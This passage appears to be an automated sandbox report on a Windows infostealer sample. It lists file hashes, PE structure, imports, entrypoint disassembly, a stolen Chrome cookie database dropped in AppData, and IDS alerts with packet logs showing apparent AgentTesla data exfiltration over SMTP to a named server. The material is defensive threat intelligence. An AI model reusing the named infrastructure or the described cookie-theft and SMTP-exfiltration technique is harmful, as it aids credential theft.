	ORDER.exe	Get hash	malicious	Browse	54.235.83.248
	a7UZzCVWKO.exe	Get hash	malicious	Browse	54.235.83.248
	QKLQkaCe9M.exe	Get hash	malicious	Browse	54.235.83.248
	sAPuJAvs52.exe	Get hash	malicious	Browse	54.235.83.248
	JlgyVmPWZr.exe	Get hash	malicious	Browse	54.235.83.248
	EIUOzWW2JX.exe	Get hash	malicious	Browse	54.235.83.248
	yCyc4rN0u8.exe	Get hash	malicious	Browse	54.235.83.248
	9cXAnovmQX.exe	Get hash	malicious	Browse	54.235.83.248
	T2HDck1Mmy.exe	Get hash	malicious	Browse	54.235.83.248
	Payment Advice Note from 19.11.2020.exe	Get hash	malicious	Browse	54.235.83.248
	PO N0.1500243224._PDF.exe	Get hash	malicious	Browse	54.235.83.248
	zRHI9DJ0YKIPfBX.exe	Get hash	malicious	Browse	54.235.83.248
	chib(1).exe	Get hash	malicious	Browse	54.235.83.248
	dede.exe	Get hash	malicious	Browse	54.235.83.248
	obi(1).exe	Get hash	malicious	Browse	54.235.83.248
	frc(1).exe	Get hash	malicious	Browse	54.235.83.248
	knitted yarn documents.exe	Get hash	malicious	Browse	54.235.83.248

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\mmnabeka.1fc\Chrome\Default\Cookies Download File
Process:	C:\Users\user\Desktop\mcsrXx9lfD.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.87101358003814
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	mcsrXx9lfD.exe
File size:	945664
MD5:	3d549885e44863c57f59eab47f2271cc
SHA1:	76c51be921ef41ff2596f3f882b91c8ede3713c7
SHA256:	1d9c8ee9be6e0ee20b600c71989292aa2efd0849611389e3121bae364d9d6adf
SHA512:	60d415743a8212cfc649ed20670d2ee4dff060cbf93475a7bc5f8d273bbbed5e472fb9d5ea055fa126d6986b250ca3203894b0454e6162fbd14e2dceeca40fc9
SSDEEP:	24576:j6j4rvrKwang6WCxVA0d6yxE6iw2lKK0D/YNN:92wa5xB62ElJubYNN
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	6861f0969ee86882

Static PE Info

General
Entrypoint:	0x4707f8
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f19034443dbba8ae65cae64d05fef57a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00470608h
call 00007F1990EA8A01h
mov eax, dword ptr [0048E6ECh]
mov eax, dword ptr [eax]
call 00007F1990EFAE65h
mov ecx, dword ptr [0048E7D8h]
mov eax, dword ptr [0048E6ECh]
mov eax, dword ptr [eax]
mov edx, dword ptr [004700F4h]
call 00007F1990EFAE65h
mov eax, dword ptr [0048E6ECh]
mov eax, dword ptr [eax]
call 00007F1990EFAED9h
call 00007F1990EA64F8h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x90000	0x247a	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9d000	0x4f5f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x95000	0x77c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x94000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x6f840	0x6fa00	False	0.523629969205	data	6.51435589822	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x71000	0x1d868	0x1da00	False	0.161260548523	data	2.59870276116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x8f000	0xcc1	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x90000	0x247a	0x2600	False	0.349403782895	data	4.92563231128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x93000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x94000	0x18	0x200	False	0.05078125	data	0.206920017787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x95000	0x77c8	0x7800	False	0.582259114583	data	6.64226915187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9d000	0x4f5f4	0x4f600	False	0.908793676181	data	7.56970916741	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x9db0c	0x134	data
RT_CURSOR	0x9dc40	0x134	data
RT_CURSOR	0x9dd74	0x134	data
RT_CURSOR	0x9dea8	0x134	data
RT_CURSOR	0x9dfdc	0x134	data
RT_CURSOR	0x9e110	0x134	data
RT_CURSOR	0x9e244	0x134	data
RT_BITMAP	0x9e378	0x1d0	data
RT_BITMAP	0x9e548	0x1e4	data
RT_BITMAP	0x9e72c	0x1d0	data
RT_BITMAP	0x9e8fc	0x1d0	data
RT_BITMAP	0x9eacc	0x1d0	data
RT_BITMAP	0x9ec9c	0x1d0	data
RT_BITMAP	0x9ee6c	0x1d0	data
RT_BITMAP	0x9f03c	0x1d0	data
RT_BITMAP	0x9f20c	0x49d04	data	English	United States
RT_BITMAP	0xe8f10	0x1d0	data
RT_BITMAP	0xe90e0	0xd8	data
RT_BITMAP	0xe91b8	0xd8	data
RT_BITMAP	0xe9290	0xd8	data
RT_BITMAP	0xe9368	0xd8	data
RT_BITMAP	0xe9440	0xd8	data
RT_ICON	0xe9518	0x1e8	data	English	United States
RT_STRING	0xe9700	0x1c4	data
RT_STRING	0xe98c4	0x210	data
RT_STRING	0xe9ad4	0xec	data
RT_STRING	0xe9bc0	0x24c	data
RT_STRING	0xe9e0c	0x140	data
RT_STRING	0xe9f4c	0x4c0	data
RT_STRING	0xea40c	0x378	data
RT_STRING	0xea784	0x378	data
RT_STRING	0xeaafc	0x418	data
RT_STRING	0xeaf14	0xf4	data
RT_STRING	0xeb008	0xc4	data
RT_STRING	0xeb0cc	0x2e0	data
RT_STRING	0xeb3ac	0x35c	data
RT_STRING	0xeb708	0x2b4	data
RT_RCDATA	0xeb9bc	0x10	data
RT_RCDATA	0xeb9cc	0x290	data
RT_RCDATA	0xebc5c	0x85d	Delphi compiled form 'TForm1'
RT_GROUP_CURSOR	0xec4bc	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec4d0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec4e4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec4f8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec50c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec520	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0xec534	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0xec548	0x14	data	English	United States
RT_HTML	0xec55c	0x98	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
opengl32.dll	wglDeleteContext
user32.dll	WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
kernel32.dll	MulDiv
kernel32.dll	AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/20/20-20:06:14.054607	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49766	587	192.168.2.4	208.91.199.225
11/20/20-20:06:19.529008	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49767	587	192.168.2.4	208.91.199.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 20:06:02.867763042 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:02.970710039 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:02.970840931 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.048233032 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.151184082 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.151365995 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.151412010 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.151449919 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.151488066 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.151523113 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.151604891 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.152462959 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.193653107 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.296808958 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.337061882 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.527725935 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:03.650266886 CET	443	49765	54.235.83.248	192.168.2.4
Nov 20, 2020 20:06:03.696402073 CET	49765	443	192.168.2.4	54.235.83.248
Nov 20, 2020 20:06:12.046245098 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:12.195732117 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:12.195873022 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:12.812896967 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:12.813532114 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:12.963042974 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:12.963083982 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:12.965086937 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.117259979 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:13.118549109 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.272712946 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:13.273732901 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.426875114 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:13.427592993 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.587024927 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:13.587740898 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.900435925 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:13.970786095 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:13.970876932 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:14.052644968 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:14.054606915 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:14.054723978 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:14.054792881 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:14.054862022 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:14.206177950 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:14.206207037 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:14.304539919 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:14.353532076 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:15.132817984 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:15.285135031 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:15.285177946 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:15.285315037 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:15.285629988 CET	49766	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:15.287194967 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:15.437752962 CET	587	49766	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.291451931 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:18.443504095 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.443722963 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:18.597949028 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.598503113 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:18.750886917 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.750929117 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.751543045 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:18.905124903 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:18.905966997 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.059966087 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.060359955 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.213042021 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.213613987 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.372828960 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.373275995 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.526504993 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.528677940 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.529007912 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.529237986 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.529467106 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.529825926 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.530020952 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.530205011 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.530380964 CET	49767	587	192.168.2.4	208.91.199.225
Nov 20, 2020 20:06:19.682955027 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.683171988 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.683890104 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.683937073 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.723391056 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.782569885 CET	587	49767	208.91.199.225	192.168.2.4
Nov 20, 2020 20:06:19.822771072 CET	49767	587	192.168.2.4	208.91.199.225

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 20:04:25.524873972 CET	62389	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:25.551821947 CET	53	62389	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:26.320063114 CET	49910	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:26.346997976 CET	53	49910	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:27.294008017 CET	55854	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:27.321191072 CET	53	55854	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:28.159040928 CET	64549	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:28.194726944 CET	53	64549	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:29.805763960 CET	63153	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:29.832993984 CET	53	63153	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:30.656399012 CET	52991	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:30.683475018 CET	53	52991	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:31.821947098 CET	53700	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:31.848968029 CET	53	53700	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:33.008469105 CET	51726	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:33.035512924 CET	53	51726	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:33.855465889 CET	56794	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:33.885452986 CET	53	56794	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:34.672504902 CET	56534	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:34.699506998 CET	53	56534	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:35.485847950 CET	56627	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:36.471452951 CET	56627	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:37.468499899 CET	53	56627	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:37.468878031 CET	53	56627	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:38.335410118 CET	56621	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:38.371105909 CET	53	56621	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:39.222748995 CET	63116	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:39.249989986 CET	53	63116	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:48.703561068 CET	64078	53	192.168.2.4	8.8.8.8
Nov 20, 2020 20:04:48.730670929 CET	53	64078	8.8.8.8	192.168.2.4
Nov 20, 2020 20:04:56.614922047 CET	64801	53	192.168.2.4	8.8.8.8
